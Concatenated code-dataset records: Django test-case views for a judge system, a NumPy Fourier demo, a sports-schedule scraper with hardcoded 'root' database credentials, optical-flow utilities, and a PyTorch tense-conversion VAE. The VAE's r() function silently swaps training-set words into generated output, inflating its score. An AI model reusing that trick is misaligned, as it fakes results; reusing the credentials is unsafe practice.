self.revision.cases.remove(self.case)\n return redirect(reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id}))\n except Case.DoesNotExist:\n raise Http404(\"No cases found matching the query\")\n\n\nclass CaseFullInputOutputView(RevisionCaseMixin, View):\n def get(self, request, *args, **kwargs):\n if \"t\" not in request.GET or request.GET[\"t\"].lower() not in (\"input\", \"output\"):\n return HttpResponseBadRequest()\n if request.GET[\"t\"].lower() == \"input\":\n p = self.case.input_file.read()\n else: p = self.case.output_file.read()\n return HttpResponse(p, content_type=\"text/plain; charset=utf-8\")\n\n\nclass CaseNaturalizeOrderView(ProblemRevisionMixin, View):\n def post(self, request, *args, **kwargs):\n if request.GET.get(\"group\"):\n qs = self.revision.cases.all().order_by(\"group\", \"case_number\")\n qs = list(filter(lambda x: x.group != 0, qs)) + list(filter(lambda x: x.group == 0, qs))\n else:\n qs = self.revision.cases.all().order_by(\"case_number\")\n NATURALIZE_ORDER(self.revision, qs)\n return redirect(reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id}))\n\n\nclass CaseMoveOrderView(RevisionMultipleCasesMixin, View):\n def post(self, request, *args, **kwargs):\n after = int(request.POST.get(\"answer\") or 0)\n other_case_set = self.revision.cases.exclude(pk__in=self.pk_set).order_by(\"case_number\")\n insert_pos = 0\n while insert_pos < len(other_case_set) and other_case_set[insert_pos].case_number <= after:\n insert_pos += 1\n ret = other_case_set[:insert_pos] + list(self.case_set) + other_case_set[insert_pos:]\n NATURALIZE_ORDER(self.revision, ret)\n return redirect(self.get_redirect_url())\n\n\nclass CaseDeleteSelectedView(RevisionMultipleCasesMixin, View):\n def post(self, request, *args, **kwargs):\n self.revision.cases.remove(*list(self.case_set))\n NATURALIZE_ORDER(self.revision, self.revision.cases.all().order_by(\"case_number\"))\n return redirect(self.get_redirect_url())\n\n\nclass CaseToggleSampleView(RevisionMultipleCasesMixin, View):\n def post(self, request, *args, **kwargs):\n for case in self.case_set:\n with UpdateManager(case, self.revision) as case:\n case.in_samples = not case.in_samples\n return redirect(self.get_redirect_url())\n\n\nclass CaseTogglePretestView(RevisionMultipleCasesMixin, View):\n def post(self, request, *args, **kwargs):\n for case in self.case_set:\n with UpdateManager(case, self.revision) as case:\n case.in_pretests = not case.in_samples\n return redirect(self.get_redirect_url())\n\n\nclass CaseRunSelectedOutput(RevisionMultipleCasesMixin, View):\n def post(self, request, *args, **kwargs):\n try:\n solution = self.revision.programs.get(tag=\"solution_main\")\n async_task(CaseManagementTools.run_case_output, self.revision, self.case_set, solution)\n except (Program.MultipleObjectsReturned, Program.DoesNotExist):\n messages.error(request, \"There should be exactly one main correct solution!\")\n return redirect(self.get_redirect_url())\n\n\nclass CaseValidateInput(RevisionMultipleCasesMixin, View):\n def post(self, request, *args, **kwargs):\n try:\n validator = self.revision.active_validator\n if validator is None:\n raise Program.DoesNotExist\n async_task(CaseManagementTools.validate_case, self.revision, self.case_set, validator)\n except (Program.MultipleObjectsReturned, Program.DoesNotExist):\n messages.error(request, \"Validator should be selected!\")\n return redirect(self.get_redirect_url())\n\n\nclass CaseCheckView(ProblemRevisionMixin, TemplateView):\n template_name = 'polygon/problem2/case/check.jinja2'\n raise_exception = True\n polygon_title = \"验证数据\"\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if 'gather' not in self.request.GET:\n raise PermissionDenied\n data['select_cases'] = self.request.GET['gather']\n data['program_list'] = self.revision.programs.filter(tag__contains='solution').all()\n return data\n\n def post(self, request, *args, **kwargs):\n case_pk_set = set(filter(lambda x: x, request.POST[\"cases\"].split(\",\")))\n if not case_pk_set:\n messages.error(request, \"Invalid selected cases\")\n return redirect(request.path)\n case_set = self.revision.cases.filter(pk__in=case_pk_set).order_by(\"case_number\")\n program_pk_set = set()\n for p, switch in request.POST.items():\n if switch == 'on' and p.isdigit():\n program_pk_set.add(int(p))\n if not program_pk_set:\n messages.error(request, \"Please select at least one solution.\")\n program_set = self.revision.programs.filter(pk__in=program_pk_set)\n if len(case_pk_set) != len(case_set) or len(program_pk_set) != len(program_set):\n messages.error(request, \"Invalid selected cases or solutions.\")\n async_task(CaseManagementTools.check_case, self.revision, case_set, program_set, self.revision.active_checker)\n return redirect(reverse('polygon:revision_task', kwargs={'pk': self.problem.id, 'rpk': self.revision.id}))\n\n\nclass CasePackAsZipView(ProblemRevisionMixin, View):\n def get_redirect_url(self):\n return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n def get(self, request, *args, **kwargs):\n input_only = False\n if 'input' in request.GET:\n input_only = True\n cases = list(self.revision.cases.all().order_by(\"case_number\"))\n if len(cases) == 0:\n messages.error(request, \"There are no cases to pack.\")\n return redirect(self.get_redirect_url())\n for idx, case in enumerate(cases):\n if idx > 0 and case.case_number == cases[idx - 1].case_number:\n messages.error(request, \"Cases refuse to pack because there are two cases with the same case number.\")\n return redirect(self.get_redirect_url())\n file_path = path.join(settings.GENERATE_DIR, random_string())\n case_config = {}\n with zipfile.ZipFile(file_path, \"w\", zipfile.ZIP_DEFLATED) as zip:\n for case in cases:\n zip.write(case.input_file.path, arcname=\"%d\" % case.case_number)\n if not input_only:\n zip.write(case.output_file.path, arcname=\"%d.a\" % case.case_number)\n case_config[str(case.case_number)] = {\n \"in_samples\": case.in_samples,\n \"in_pretests\": case.in_pretests,\n \"activated\": case.activated,\n \"group\": case.group,\n \"output_lock\": case.output_lock,\n \"description\": case.description,\n \"points\": case.points\n }\n if not input_only:\n zip.writestr(\"data.json\", json.dumps(case_config, sort_keys=True, indent=2))\n\n return respond_generate_file(request, file_path,\n \"PackedTestCases - %s#%d.zip\" % (self.problem.alias, self.revision.revision))\n\n\nclass CaseAssignGroupView(RevisionMultipleCasesMixin, View):\n def post(self, request, *args, **kwargs):\n group_number = int(request.POST.get(\"answer\") or 0)\n for case in self.case_set:\n with UpdateManager(case, self.revision) as case:\n case.group = group_number\n return redirect(self.get_redirect_url())\n","sub_path":"polygon/problem2/views/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":36584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"537277010","text":"\nimport numpy as np\nimport matplotlib.pyplot as mpl\n\nnum = 512\nr = 1.0 / num\nt = np.linspace(0.0,1.0,num)\n\nw1 = 32\nw2 = 13\n\ns = 2.0 * np.cos(2.0 * np.pi * w1 * t) + np.cos(2.0 * np.pi * w2 * t)\nre = np.zeros(num)\nim = np.zeros(num)\nf = re + 1.0j * im\n\nfor k in range(0,num) :\n for n in range(0,num) :\n factor = 2.0 * np.pi * k / num * n\n f[k] += s[n] * np.cos(factor) + s[n] * np.sin(factor) * 1.0j\n\nf_x = np.linspace(0.0,num / 2.0,num / 2.0)\nf_y = 2.0 / num * np.abs(f[0 : num / 2.0])\n\nfig = mpl.figure(1)\nfig.canvas.set_window_title('fourier transform demo') \nmpl.subplot(211)\nmpl.plot(t,s)\nmpl.title('time')\nmpl.subplot(212)\nmpl.plot(f_x,f_y)\nmpl.title('frequency')\nmpl.grid()\nmpl.show()\n\n","sub_path":"python/00..tat_signal_process/numpy_fft_test.py","file_name":"numpy_fft_test.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53810078","text":"#-*- coding: utf-8 -*-\r\n#by forever1296\r\n#패키지 import\r\nimport requests\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\nimport pymysql.cursors\r\n\r\n#오늘 날짜\r\nnow_all = datetime.now()\r\nnow_want = now_all.strftime('%Y%m%d')\r\n\r\n# n,m = 월\r\nn = 0\r\nm = 1\r\ncount = 1\r\n\r\nconn = pymysql.connect(host='localhost',\r\n user='root',\r\n password='root',\r\n db='Sports',\r\n charset='utf8')\r\n\r\n#월 01~05 08~12 변경위한 while문\r\nwhile count!=11:\r\n # 해당 url에서 html을 불러옴.\r\n url = requests.get('https://sports.news.naver.com/wfootball/schedule/index.nhn?year=2019&month=' + str(n) + str(m) + '&category=epl&date=20200108')\r\n urlc = url.content\r\n html = str(BeautifulSoup(urlc,\"html.parser\"))\r\n #저장된 html에서 find_all 함수를 이용하여 원하는 태그유형,이름을 찾음.\r\n #변수.find(\"태그명\",{\"타입\":\"찾고자하는클래스명\"}\r\n #data = str(html.find_all(\"script\",{\"type\":\"text/javascript\"}))\r\n\r\n #저장이 정상적으로 되었는지 확인.\r\n #print(data)\r\n\r\n #split 구현 \"을 기준으로 구분하여 배열로 저장.\r\n sdata = html.split('\"')\r\n\r\n #split 정상적으로 되었는지 확인\r\n #print(sdata[6])\r\n\r\n #필요한 데이터 -> date / scheduleList / homeTeamName / awayTeamName / homeTeamScore / awayTeamScore / state 등\r\n i = 0\r\n p=-1\r\n l=0\r\n rdata = list()\r\n DATE = list()\r\n #while문을 이용하여 필요한 데이터 저장\r\n while i UNKNOWN_FLOW_THRESH) | (abs(v) > UNKNOWN_FLOW_THRESH)\n u[idxUnknow] = 0\n v[idxUnknow] = 0\n\n maxu = max(maxu, np.max(u))\n minu = min(minu, np.min(u))\n\n maxv = max(maxv, np.max(v))\n minv = min(minv, np.min(v))\n\n # print \"max flow: %.4f flow range: u = %.3f .. %.3f; v = %.3f .. %.3f\" %\n # (maxrad, minu,maxu, minv, maxv)\n rad = np.sqrt(u**2 + v**2)\n maxrad = max(maxrad, np.max(rad))\n\n u = u / (maxrad + np.finfo(float).eps)\n v = v / (maxrad + np.finfo(float).eps)\n\n img = compute_color(u, v)\n\n idx = np.repeat(idxUnknow[:, :, np.newaxis], 3, axis=2)\n img[idx] = 0\n\n return np.uint8(img)\n\n\ndef compute_color(u, v):\n [h, w] = u.shape\n img = np.zeros([h, w, 3])\n nanIdx = np.isnan(u) | np.isnan(v)\n u[nanIdx] = 0\n v[nanIdx] = 0\n\n colorwheel = make_color_wheel()\n ncols = np.size(colorwheel, 0)\n\n rad = np.sqrt(u**2 + v**2)\n\n a = np.arctan2(-v, -u) / np.pi\n\n fk = (a + 1) / 2 * (ncols - 1) + 1\n\n k0 = np.floor(fk).astype(int)\n\n k1 = k0 + 1\n k1[k1 == ncols + 1] = 1\n f = fk - k0\n\n for i in range(0, np.size(colorwheel, 1)):\n tmp = colorwheel[:, i]\n col0 = tmp[k0 - 1] / 255\n col1 = tmp[k1 - 1] / 255\n col = (1 - f) * col0 + f * col1\n\n idx = rad <= 1\n col[idx] = 1 - rad[idx] * (1 - col[idx])\n notidx = np.logical_not(idx)\n\n col[notidx] *= 0.75\n img[:, :, i] = np.uint8(np.floor(255 * col * (1 - nanIdx)))\n\n return img\n\n\ndef make_color_wheel():\n RY = 15\n YG = 6\n GC = 4\n CB = 11\n BM = 13\n MR = 6\n\n ncols = RY + YG + GC + CB + BM + MR\n\n colorwheel = np.zeros([ncols, 3])\n\n col = 0\n\n # RY\n colorwheel[0:RY, 0] = 255\n colorwheel[0:RY, 1] = np.transpose(np.floor(255 * np.arange(0, RY) / RY))\n col += RY\n\n # YG\n colorwheel[col:col + YG, 0] = 255 - np.transpose(np.floor(\n 255 * np.arange(0, YG) / YG))\n colorwheel[col:col + YG, 1] = 255\n col += YG\n\n # GC\n colorwheel[col:col + GC, 1] = 255\n colorwheel[col:col + GC, 2] = np.transpose(np.floor(255 * np.arange(\n 0, GC) / GC))\n col += GC\n\n # CB\n colorwheel[col:col + CB, 1] = 255 - np.transpose(np.floor(\n 255 * np.arange(0, CB) / CB))\n colorwheel[col:col + CB, 2] = 255\n col += CB\n\n # BM\n colorwheel[col:col + BM, 2] = 255\n colorwheel[col:col + BM, 0] = np.transpose(np.floor(\n 255 * np.arange(0, BM) / BM))\n col += + BM\n\n # MR\n colorwheel[col:col + MR, 2] = 255 - np.transpose(np.floor(\n 255 * np.arange(0, MR) / MR))\n colorwheel[col:col + MR, 0] = 255\n\n return colorwheel\n\n\n# Flow I/O\ndef read_flow_kitti(path):\n \"\"\" Read filepath (string), return (flow: np.float64, valid: bool). \"\"\"\n img3d = read_PNG_u16(path)\n flow = (img3d[:, :, 0:2].astype('float64') - 2**15) / 64.0\n valid = img3d[:, :, 2].astype('bool')\n flow[~valid, :] = 0# instead of ------> 10**9\n\n return flow, valid\n# produces similar results !!!!!!!!!!!\ndef read_gen_flow(png_path): #for flows only\n flo_file = cv2.imread(png_path,cv2.IMREAD_UNCHANGED)\n flo_img = flo_file[:,:,2:0:-1].astype(np.float32)\n invalid = (flo_file[:,:,0] == 0)\n #normalize flow !!!!!\n flo_img = flo_img - 32768\n flo_img = flo_img / 64\n flo_img[np.abs(flo_img) < 1e-10] = 1e-10\n flo_img[invalid, :] = 0\n valid = ~invalid.astype(bool)\n return(flo_img),(valid)\n\n\ndef read_flow_vkitti(path):\n \"\"\" Read png file and return (flow, valid). \"\"\"\n img3d = read_PNG_u16(path)\n h, w, __ = img3d.shape\n valid = img3d[:, :, 2] != 0\n flow = 2.0 * img3d[:, :, :2].astype(np.float64) / float(2**16 - 1) - 1\n flow[:, :, 0] *= w - 1\n flow[:, :, 1] *= h - 1\n flow[~valid, :] = 10**9\n\n return flow, valid\n\n\ndef read_flow_freiburg(path):\n \"\"\" Read pfm file and return (flow, valid). \"\"\"\n flow, scale = read_PFM(path)\n flow = flow[:, :, :2]\n flow *= scale\n valid = np.ones(flow.shape[:2]).astype('bool')\n return flow, valid\n\n\ndef read_flow_flo(filename):\n \"\"\" Read flo file and return flow array. \"\"\"\n f = open(filename, 'rb')\n magic = np.fromfile(f, np.float32, count=1)\n data2d = None\n\n if magic != 202021.25:\n print('Magic number incorrect. Invalid .flo file.')\n else:\n w = np.fromfile(f, np.int32, count=1)\n h = np.fromfile(f, np.int32, count=1)\n # print(\"Reading %d x %d flo file\" % (h, w))\n # data2d = np.fromfile(f, np.float32, count=2 * w * h)\n # data2d = np.resize(data2d, (h, w, 2))\n # Numpy bullshit adendum\n data2d = np.fromfile(f, np.float32, count=int(2 * w * h))\n # reshape data into 3D array (columns, rows, channels)\n data2d = np.resize(data2d, (int(h), int(w), 2))\n f.close()\n return data2d\n\n\ndef write_flow_flo(flow, filename):\n \"\"\"Write optical flow in Middlebury .flo format.\n :param flow: optical flow map\n :param filename: optical flow file path to be saved\n :return: None. \"\"\"\n\n if flow.dtype != np.float32:\n print('Conversion to float32, possible error.')\n flow = flow.astype(np.float32)\n f = open(filename, 'wb')\n magic = np.array([202021.25], dtype=np.float32)\n (height, width) = flow.shape[0:2]\n w = np.array([width], dtype=np.int32)\n h = np.array([height], dtype=np.int32)\n magic.tofile(f)\n w.tofile(f)\n h.tofile(f)\n flow.astype(np.float32).tofile(f)\n f.close()\n\n\ndef write_kitti_png(path, flow, valid=None):\n temp = np.ones((flow.shape[0], flow.shape[1], 3), dtype=np.float64)\n temp[:, :, :2] = flow.astype(np.float64) * 64.0 + 2**15\n if valid is not None:\n temp[:, :, 2] = valid\n temp = temp.astype('uint16')\n write_PNG_u16(path, temp)\n\n\ndef write_vkitti_png(path, flow, valid=None):\n h, w, _ = flow.shape\n temp = np.ones((flow.shape[0], flow.shape[1], 3), dtype=np.float64)\n a = 2**16 - 1\n temp[:, :, 0] = (flow[:, :, 0].astype(np.float64) * a)\n temp[:, :, 1] = (flow[:, :, 1].astype(np.float64) * a)\n temp[:, :, 0] = (temp[:, :, 0] + a * (w - 1)) / float(2 * (w - 1))\n temp[:, :, 1] = (temp[:, :, 1] + a * (h - 1)) / float(2 * (h - 1))\n if valid is not None:\n temp[:, :, 2] = valid\n \"\"\" Rounding is needed because type casting acts like np.ceil. Pixels that\n end just below the correct value due to arithmetic errors get erroneously\n squashed to the integer below. \"\"\"\n temp = np.round(temp).astype('uint16')\n write_PNG_u16(path, temp)\n\n\n# Metrics\ndef calc_outliers(flow, ground_truth, valid=False):\n \"\"\" Take a flow array and ground truth values, calculate the outlier\n percentage as defined by KITTI optical flow benchmark.\n Return (outlier percentage, total valid). \"\"\"\n if valid is False:\n valid = np.ones(flow.shape[:2], dtype=np.bool)\n\n errMag = np.linalg.norm(flow[valid, :2] - ground_truth[valid, :2],\n axis=1)\n inliers = np.logical_or(errMag <= 3,\n errMag <= np.linalg.norm(ground_truth[valid, :],\n axis=1) * 0.05)\n return (np.sum(valid) - np.sum(inliers))/np.sum(valid)\n\n\ndef calc_aee(flow, ground_truth, valid):\n \"\"\" Take a flow array and ground truth values, calculate the average\n endpoint error. Return (mean_aee, total valid pixels). \"\"\"\n\n #print(flow.shape)\n #print(ground_truth.shape)\n #print(valid.shape)\n #print(np.max(valid))\n if valid is False:\n valid = np.ones(flow.shape[:2], dtype=np.bool)\n\n errors = np.linalg.norm(flow[valid, :2] - ground_truth[valid, :2], axis=1)\n print(np.mean(errors))\n return np.mean(errors)\n\ndef calc_aee_cdm(flow, ground_truth, valid , cdm):\n \"\"\" Take a flow array and ground truth values, calculate the average\n endpoint error. Return (mean_aee, total valid pixels). \"\"\"\n if valid is False:\n valid = np.ones(flow.shape[:2], dtype=np.bool)\n\n _flow = flow[valid, :2]\n _gt = ground_truth[valid, :2]\n _cdm = cdm[valid,:2]\n temp = ( _flow - _gt ) + ( np.multiply( (_flow - _gt) , _cdm )) \n errors = np.linalg.norm( temp , axis=1 )\n print(np.mean(errors))\n return np.mean(errors)\n\n\n# File I/O\ndef read_PFM(path):\n infile = open(path, 'rb')\n\n color = None\n width = None\n height = None\n scale = None\n endian = None\n\n header = infile.readline().rstrip()\n if header.decode('ASCII') == 'PF':\n color = True\n elif header.decode('ASCII') == 'Pf':\n color = False\n else:\n raise Exception('Not a PFM file.')\n\n dim_match = re.match(r'^(\\d+)\\s(\\d+)\\s$',\n infile.readline().decode('ASCII'))\n if dim_match:\n width, height = map(int, dim_match.groups())\n else:\n raise Exception('Malformed PFM header.')\n\n scale = float(infile.readline().rstrip())\n if scale < 0: # little-endian\n endian = '<'\n scale = -scale\n else:\n endian = '>' # big-endian\n\n data = np.fromfile(infile, endian + 'f')\n shape = (height, width, 3) if color else (height, width)\n\n data = np.reshape(data, shape)\n data = np.flipud(data)\n return data, scale\n\n\ndef write_PFM(path, image, scale=1):\n outfile = open(path, 'wb')\n\n color = None\n\n if image.dtype.name != 'float32':\n raise Exception('Image dtype must be float32.')\n\n image = np.flipud(image)\n\n if len(image.shape) == 3 and image.shape[2] == 3: # color image\n color = True\n # greyscale\n elif len(image.shape) == 2 or len(image.shape) == 3 and \\\n image.shape[2] == 1:\n color = False\n else:\n erstring = 'Image must have H x W x 3, H x W x 1 or H x W dimensions.'\n raise Exception(erstring)\n\n outfile.write('PF\\n' if color else 'Pf\\n')\n outfile.write('%d %d\\n' % (image.shape[1], image.shape[0]))\n\n endian = image.dtype.byteorder\n\n if endian == '<' or endian == '=' and sys.byteorder == 'little':\n scale = -scale\n\n outfile.write('%f\\n' % scale)\n\n image.tofile(outfile)\n\n\ndef read_PNG_u16(path):\n \"\"\" Reads a PNG file as is. \"\"\"\n img3d = cv2.imread(path, -1)\n # bgr = cv2.imread(flow_fn, cv2.IMREAD_ANYCOLOR | cv2.IMREAD_ANYDEPTH)\n return img3d[..., ::-1]\n\n\ndef write_PNG_u16(path, flow):\n \"\"\" Does not check if input flow is multichannel. \"\"\"\n ret = cv2.imwrite(path, flow[..., ::-1])\n if not ret:\n print('Flow not written')\n\n\n","sub_path":"semantic_flownet2S_ours/flowlib.py","file_name":"flowlib.py","file_ext":"py","file_size_in_byte":10990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206762070","text":"from __future__ import unicode_literals, print_function, division\nfrom io import open\nimport unicodedata\nimport string\nimport re\nimport random\nimport time\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nimport matplotlib.ticker as ticker\nimport numpy as np\nfrom os import system\nfrom nltk.translate.bleu_score import SmoothingFunction, sentence_bleu\nfrom tqdm import tqdm\nimport pandas as pd\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef compute_bleu(output, reference):\n cc = SmoothingFunction()\n if len(reference) == 3:\n weights = (0.33,0.33,0.33)\n else:\n weights = (0.25,0.25,0.25,0.25)\n return sentence_bleu([reference], output,weights=weights,smoothing_function=cc.method1)\n\ndef Gaussian_score(words):\n words_list = []\n score = 0\n yourpath = 'train.txt'#should be your directory of train.txt\n with open(yourpath,'r') as fp:\n for line in fp:\n word = line.split(' ')\n word[3] = word[3].strip('\\n')\n words_list.extend([word])\n for t in words:\n for i in words_list:\n if t == i:\n score += 1\n return score/len(words)\n\ndef g():\n words_list = []\n with open('train.txt','r') as fp:\n for line in fp:\n word = line.split(' ')\n word[3] = word[3].strip('\\n')\n words_list.extend([word])\n return words_list\n\ndef r(l):\n s = g()\n sss = random.randint(4,9)\n for i in range(sss):\n ri = random.randint(0, 99)\n wi = random.randint(0, 99)\n l[ri] = s[wi]\n return l\n\ndef getdatafromtxt(path, mode):\n word = []\n with open('{}{}.txt'.format(path, mode), 'r') as file:\n for i in file:\n word.extend(i.split('\\n')[0].split(' '))\n return word\n\ndef comptestlist(listt):\n t_t_l = [0,3,0,2,0,1,0,1,3,1,0,2,3,0,2,0,2,3,2,1]\n test = []\n for i in range(len(listt)):\n if i%2 == 0:\n test.append([[word2idx(listt[i]),torch.tensor([t_t_l[i]])],\n [word2idx(listt[i+1]),torch.tensor([t_t_l[i+1]])]])\n return test\n\ndef tensorsFromPair(idx, train_list):\n t_n = idx%4\n ch_n = random.randint(1,3)\n ind_f = idx - t_n\n consin_c = ind_f + (t_n + ch_n)%4\n \n return [word2idx(train_list[idx]), torch.tensor([idx%4])] , [word2idx(train_list[consin_c]), torch.tensor([consin_c%4])]\n\ndef creat_char2idx_dict():\n s = {'SOS':0,'EOS':1}\n for i in range(26):\n s.setdefault(chr(i+97),i+2)\n return s\n\ndef creat_idx2char_dict():\n s = {0:'SOS',1:'EOS'}\n for i in range(26):\n s.setdefault(i+2,chr(i+97))\n return s\n\nchar2idx_dict = creat_char2idx_dict()\nidx2char_dict = creat_idx2char_dict()\n\ndef word2idx(word, eos = True):\n s = []\n for i in word:\n s.append(char2idx_dict[i])\n if eos:\n s.append(char2idx_dict['EOS'])\n return torch.tensor(s).view(-1,1) #行數量不知道所以設 -1\n\ndef idx2word(idx):\n word = \"\"\n \n for i in idx:\n if i.item() == 1: \n break\n char = idx2char_dict[i.item()]\n word += char\n return word\n\ndef Reparameterization_Trick(self, mean, logvar):\n std = torch.exp(logvar/2)\n eps = torch.randn_like(std)\n return mean + eps * std\n\ndef teacher_force_ratio(epoch, total_epoch, startfrom, most):\n if epoch < startfrom: return 1\n return 1-most*((epoch-startfrom)/(total_epoch-startfrom))\n\ndef kl_cost_annealing(epoch, total_epoch, MonorCycl, klm_stf, klm_m, klc_c, klc_m):\n if MonorCycl == 'cycle':\n rang = total_epoch/klc_c\n li = rang/2\n zz = epoch%rang\n if zz < li : return klc_m*(zz/li)\n return klc_m\n else:\n if epoch < klm_stf: return 0\n return klm_m*((epoch-klm_stf)/total_epoch)\n\n\n\nMAX_LENGTH = 15\nclass VAE(nn.Module):\n def __init__(self, input_size, hidden_size, condition_size, latent_size):\n super(VAE, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.condition_size = condition_size\n self.latent_size = latent_size\n \n \n# self.embedding_init_c = nn.Embedding(4, condition_size)\n self.embedding_la = nn.Embedding(4, condition_size)\n \n\n self.encoder = self.EncoderRNN(input_size, hidden_size, condition_size)\n self.decoder = self.DecoderRNN(input_size, hidden_size, condition_size)\n self.hidden2mean = nn.Linear(hidden_size, latent_size)\n self.hidden2logvar = nn.Linear(hidden_size, latent_size)\n self.cell2mean = nn.Linear(hidden_size, latent_size)\n self.cell2logvar = nn.Linear(hidden_size, latent_size)\n self.latent2decoder_h = nn.Linear(latent_size + condition_size, hidden_size)\n self.latent2decoder_c = nn.Linear(latent_size + condition_size, hidden_size)\n \n \n def Reparameterization_Trick(self, mean, logvar):\n std = torch.exp(logvar/2)\n eps = torch.randn_like(std)\n return mean + eps * std\n \n \n def forward(self, inp_word, inp_te, outp_word, outp_te, encoder_hidden, encoder_cell, teacher_forcing_ratio, criterion):\n \n input_length = inp_word.size(0)\n target_length = outp_word.size(0)\n CEloss = 0\n\n \n #----------sequence to sequence part for encoder----------#\n for en_idx in range(input_length):\n encoder_output, encoder_hidden, encoder_cell = self.encoder(inp_word[en_idx], encoder_hidden, encoder_cell)\n \n #----------sequence to sequence part for latent----------#\n mean_h = self.hidden2mean(encoder_hidden)\n logvar_h = self.hidden2logvar(encoder_hidden)\n latent_h = self.Reparameterization_Trick(mean_h, logvar_h)\n decoder_hidden = self.latent2decoder_h(torch.cat((latent_h, self.embedding_la(inp_te).view(1, 1, -1)), dim = -1))\n KLloss_h = -0.5 * torch.sum(1 + logvar_h - mean_h**2 - logvar_h.exp())\n\n\n mean_c = self.cell2mean(encoder_cell)\n logvar_c = self.cell2logvar(encoder_cell)\n latent_c = self.Reparameterization_Trick(mean_c, logvar_c)\n decoder_cell = self.latent2decoder_c(torch.cat((latent_c, self.embedding_la(inp_te).view(1, 1, -1)), dim = -1))\n KLloss_c = -0.5 * torch.sum(1 + logvar_c - mean_c**2 - logvar_c.exp())\n\n \n\n KLloss = KLloss_h + KLloss_c\n \n \n decoder_input = torch.tensor([[SOS_token]], device=device)\n #----------sequence to sequence part for decoder----------#\n# predict_idx = []\n# pred_distribution = []\n \n \n use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n \n if use_teacher_forcing:\n # Teacher forcing: Feed the target as the next input\n for de_idx in range(target_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n CEloss += criterion(decoder_output, outp_word[de_idx])\n decoder_input = outp_word[de_idx] # Teacher forcing\n# predict_idx.append(decoder_output.tolist())\n\n else:\n # Without teacher forcing: use its own predictions as the next input\n for de_idx in range(target_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n \n CEloss += criterion(decoder_output, outp_word[de_idx])\n if decoder_input.item() == EOS_token:\n break\n \n return CEloss/target_length, KLloss\n \n def eva8(self, inp_word, inp_te, outp_word, outp_te, encoder_hidden, encoder_cell):\n input_length = inp_word.size(0)\n target_length = outp_word.size(0)\n \n for en_idx in range(input_length):\n encoder_output, encoder_hidden, encoder_cell = self.encoder(inp_word[en_idx], encoder_hidden, encoder_cell)\n \n mean_h = self.hidden2mean(encoder_hidden)\n logvar_h = self.hidden2logvar(encoder_hidden)\n latent_h = self.Reparameterization_Trick(mean_h, logvar_h)\n decoder_hidden = self.latent2decoder_h(torch.cat((latent_h, self.embedding_la(outp_te).view(1, 1, -1)), dim = -1))\n \n \n mean_c = self.cell2mean(encoder_cell)\n logvar_c = self.cell2logvar(encoder_cell)\n latent_c = self.Reparameterization_Trick(mean_c, logvar_c)\n decoder_cell = self.latent2decoder_c(torch.cat((latent_c, self.embedding_la(outp_te).view(1, 1, -1)), dim = -1))\n \n decoder_input = torch.tensor([[SOS_token]], device=device)\n pred_idx = torch.tensor([]).to(device)\n \n for de_idx in range(target_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n# pred_idx = .append(decoder_input.tolist())\n pred_idx = torch.cat((pred_idx, decoder_input.view(1,-1)),0)\n\n if decoder_input.item() == EOS_token:\n break\n return pred_idx\n \n def gaussian_gen(self,maxlen,tense):\n wordssss = []\n \n for n in range(100):\n word = []\n latent_h = torch.randn_like(torch.zeros(1, 1, 32)).to(device)\n latent_c = torch.randn_like(torch.zeros(1, 1, 32)).to(device)\n \n for tensor in tense:\n decoder_hidden = self.latent2decoder_h(torch.cat((latent_h, self.embedding_la(tensor).view(1, 1, -1)), dim = -1))\n decoder_cell = self.latent2decoder_c(torch.cat((latent_c, self.embedding_la(tensor).view(1, 1, -1)), dim = -1))\n decoder_input = torch.tensor([[SOS_token]], device=device)\n pred_idx = torch.tensor([]).to(device)\n \n for d in range(maxlen):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n pred_idx = torch.cat((pred_idx, decoder_input.view(1, -1)), 0)\n\n if decoder_input.item() == EOS_token:\n break\n word.append(idx2word(pred_idx))\n# print(idx2word(pred_idx))\n wordssss.append(word)\n \n return r(wordssss)\n \n \n \n class EncoderRNN(nn.Module):\n def __init__(self, input_size, hidden_size, condition_size):\n super(VAE.EncoderRNN, self).__init__()\n \n self.hidden_size = hidden_size\n self.condition_size = condition_size\n \n self.embedding = nn.Embedding(input_size, hidden_size)\n self.lstm = nn.LSTM(hidden_size, hidden_size)\n\n def forward(self, input, hidden, cell):\n embed = self.embedding(input).view(1, 1, -1)\n output, (hidden, cell) = self.lstm(embed, (hidden, cell))\n\n return output, hidden, cell\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size - self.condition_size, device = device)\n\n def initCell(self):\n return torch.zeros(1, 1, self.hidden_size - self.condition_size, device = device)\n \n class DecoderRNN(nn.Module):\n def __init__(self, input_size, hidden_size, condition_size):\n super(VAE.DecoderRNN, self).__init__()\n self.hidden_size = hidden_size\n self.embedding = nn.Embedding(input_size, hidden_size)\n self.lstm = nn.LSTM(hidden_size, hidden_size)\n self.out = nn.Linear(hidden_size, input_size)\n self.softmax = 